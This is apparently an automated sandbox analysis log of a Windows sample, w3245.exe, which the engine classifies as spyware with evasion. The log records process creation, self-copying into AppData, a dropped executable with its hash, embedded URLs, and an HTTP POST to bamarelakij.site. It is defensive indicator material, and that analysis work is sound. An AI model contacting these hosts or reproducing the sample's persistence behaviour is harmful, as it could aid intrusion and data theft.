Source: global traffic; DNS traffic detected: DNS query: assets.msn.com
Source: global traffic; DNS traffic detected: DNS query: api.msn.com
Source: global traffic; DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: unknown; HTTP traffic detected:
POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
Content-Length: 147
Host: bamarelakij.site
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.es/
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.es/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newstore/
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.fr/
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.it/
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.it/reimpostare-passwordi-di-windows-login.html
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.jp/
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.jp/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newstore/
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.kr/
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.net/
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.net//reset-windows-password.htmlhttp://support.reneelab.com/anonymous_requests/n
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.pl/
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.pl/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newpurcha
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.ru/
Source: RescueCDBurner.exe, 00000002.00000002.1746995711.00000000097EA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805377766.0000000009BD8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091623344.0000000005148000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.com
Source: RescueCDBurner.exe, 00000002.00000002.1746995711.00000000097EA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805377766.0000000009BD8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091623344.0000000005148000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.de
Source: RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.surfok.de/
Source: RescueCDBurner.exe, 00000002.00000002.1746995711.00000000097EA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805377766.0000000009BD8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091623344.0000000005148000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
Source: RescueCDBurner.exe, 00000002.00000002.1746995711.00000000097EA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805377766.0000000009BD8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091623344.0000000005148000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
Source: RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.trialpay.com/productpage/?c=3016dc6&tid=6rpipbo
Source: RescueCDBurner.exe, 00000002.00000002.1746995711.00000000097EA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805377766.0000000009BD8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091623344.0000000005148000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
Source: RescueCDBurner.exe, 00000002.00000002.1746995711.00000000097EA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805377766.0000000009BD8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091623344.0000000005148000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
Source: RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000003.1731750258.0000000000E9A000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.winimage.com/zLibDll1.2.6
Source: RescueCDBurner.exe, 00000002.00000002.1748933736.000000006C159000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000003.00000002.1807317084.000000006B539000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://xml.org/sax/features/namespace-prefixes
Source: RescueCDBurner.exe, 00000002.00000002.1748933736.000000006C159000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000003.00000002.1807317084.000000006B539000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://xml.org/sax/features/namespaces
Source: RescueCDBurner.exe, 00000002.00000002.1746995711.00000000097EA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805377766.0000000009BD8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091623344.0000000005148000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
Source: RescueCDBurner.exe, 00000002.00000002.1746995711.00000000097EA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805377766.0000000009BD8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091623344.0000000005148000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
Source: LocalCtrl_alpha_v3.exe, 0000000D.00000003.2833316180.0000000007E9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000003.1731750258.0000000000E9A000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com.cn/download_api.php
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com.cn/passnow/passnow_
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000003.1731750258.0000000000E9A000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com/download_api.php
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000003.1731750258.0000000000E9A000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com/download_api.phphttps://downloads.reneelab.com.cn/download_api.php?ac
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com/passnow/passnow_
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com/passnow/passnow_cnhttps://downloads.reneelab.com.cn/passnow/passnow_x
Source: LocalCtrl_alpha_v3.exe, 0000000D.00000003.2833316180.0000000007E9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA13Q6AL.img
Source: LocalCtrl_alpha_v3.exe, 0000000D.00000003.2833316180.0000000007E9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hk7Sh.img
Source: LocalCtrl_alpha_v3.exe, 0000000D.00000003.2833316180.0000000007E9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1lFz6G.img
Source: LocalCtrl_alpha_v3.exe, 0000000D.00000003.2833316180.0000000007E9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1msOOW.img
Source: LocalCtrl_alpha_v3.exe, 0000000D.00000003.2833316180.0000000007E9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1msOZ4.img
Source: LocalCtrl_alpha_v3.exe, 0000000D.00000003.2833316180.0000000007E9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://msn.com
Source: LocalCtrl_alpha_v3.exe, 0000000D.00000003.2833316180.0000000007E9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com
Source: LocalCtrl_alpha_v3.exe, 0000000D.00000003.2833316180.0000000007E9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comreport-to:
Source: RescueCDBurner.exe, 00000002.00000002.1746995711.00000000097EA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805377766.0000000009BD8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091623344.0000000005148000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://www.reneelab.com
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://www.reneelab.comwww.reneelab.comhttp://https://0
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe Code function: 1_2_5BB43C8C _CreateDesktop_@24,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,GlobalAlloc,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,strcpy,strcpy,CreateDesktopA,lstrlenA,MultiByteToWideChar,GlobalFree,lstrlenA,MultiByteToWideChar,GlobalFree,lstrlenA,MultiByteToWideChar,GlobalFree,lstrlenA,MultiByteToWideChar,GlobalFree,GlobalFree
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe Code function: 1_2_5BB3EEEA _CreateProcessAsUser_@44,SetLastError,newMultiByteFromWideChar,newMultiByteFromWideChar,newMultiByteFromWideChar,memset,newMultiByteFromWideChar,CreateProcessAsUserA,GlobalFree,GlobalFree,GlobalFree,GlobalFree
Source: C:\Users\user\Desktop\w3245.exe File deleted: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
Source: LocalCtrl_alpha_v3.exe.4.drStatic PE information: Resource name: ZIP type: Zip archive data (empty)
Source: hsiywoxwiypiaj.4.drStatic PE information: Number of sections : 12 > 10
Source: eykunyxpxybnsa.11.drStatic PE information: Number of sections : 12 > 10
Source: w3245.exe, 00000000.00000000.1694798990.000000000096D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameconn.exe8 vs w3245.exe
Source: w3245.exe, 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenameSQLUNIRL.DLLJ vs w3245.exe
Source: w3245.exe, 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenameconn.exe8 vs w3245.exe
Source: w3245.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
Source: classification engineClassification label: mal76.spyw.evad.winEXE@72/361@21/15
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0093FE21 FormatMessageW,GetLastError,LocalFree,0_2_0093FE21
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_009045EE GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,0_2_009045EE
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00C845EE GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,1_2_00C845EE
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_5BB3CB21 _GetDiskFreeSpaceEx_@16,GetVersionExA,SetLastError,newMultiByteFromWideChar,LoadLibraryW,GetProcAddress,FreeLibrary,GlobalFree,1_2_5BB3CB21
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: _CreateService_@52,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,CreateServiceA,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,1_2_5BB42A14
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0094304F GetModuleHandleA,GetLastError,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoCreateInstance,ExitProcess,0_2_0094304F
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_5BB37CC0 _FindResource@12,FindResourceW,newMultiByteFromWideChar,newMultiByteFromWideChar,FindResourceA,GlobalFree,GlobalFree,1_2_5BB37CC0
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_00926B88 ChangeServiceConfigW,GetLastError,0_2_00926B88
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_5BB439D2 _StartServiceCtrlDispatcher_@4,lstrlenW,GlobalAlloc,GlobalAlloc,WideCharToMultiByte,StartServiceCtrlDispatcherA,MultiByteToWideChar,GlobalFree,GlobalFree,1_2_5BB439D2
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\TaskManage
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7468:120:WilError_03
Source: C:\Users\user\Desktop\w3245.exeFile created: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\
Source: C:\Users\user\Desktop\w3245.exeCommand line argument: cabinet.dll0_2_00901070
Source: C:\Users\user\Desktop\w3245.exeCommand line argument: msi.dll0_2_00901070
Source: C:\Users\user\Desktop\w3245.exeCommand line argument: version.dll0_2_00901070
Source: C:\Users\user\Desktop\w3245.exeCommand line argument: wininet.dll0_2_00901070
Source: C:\Users\user\Desktop\w3245.exeCommand line argument: comres.dll0_2_00901070
Source: C:\Users\user\Desktop\w3245.exeCommand line argument: clbcatq.dll0_2_00901070
Source: C:\Users\user\Desktop\w3245.exeCommand line argument: msasn1.dll0_2_00901070
Source: C:\Users\user\Desktop\w3245.exeCommand line argument: crypt32.dll0_2_00901070
Source: C:\Users\user\Desktop\w3245.exeCommand line argument: feclient.dll0_2_00901070
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCommand line argument: cabinet.dll1_2_00C81070
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCommand line argument: msi.dll1_2_00C81070
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCommand line argument: version.dll1_2_00C81070
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCommand line argument: wininet.dll1_2_00C81070
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCommand line argument: comres.dll1_2_00C81070
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCommand line argument: clbcatq.dll1_2_00C81070
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCommand line argument: msasn1.dll1_2_00C81070
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCommand line argument: crypt32.dll1_2_00C81070
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCommand line argument: feclient.dll1_2_00C81070
Source: w3245.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSystem information queried: HandleInformation
Source: C:\Windows\SysWOW64\cmd.exeFile read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\w3245.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: w3245.exeString found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: C:\Users\user\Desktop\w3245.exeFile read: C:\Users\user\Desktop\w3245.exe
Source: unknownProcess created: C:\Users\user\Desktop\w3245.exe "C:\Users\user\Desktop\w3245.exe"
Source: C:\Users\user\Desktop\w3245.exeProcess created: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe "C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe" -burn.clean.room="C:\Users\user\Desktop\w3245.exe" -burn.filehandle.attached=688 -burn.filehandle.self=692
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeProcess created: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeProcess created: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe "C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe"
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
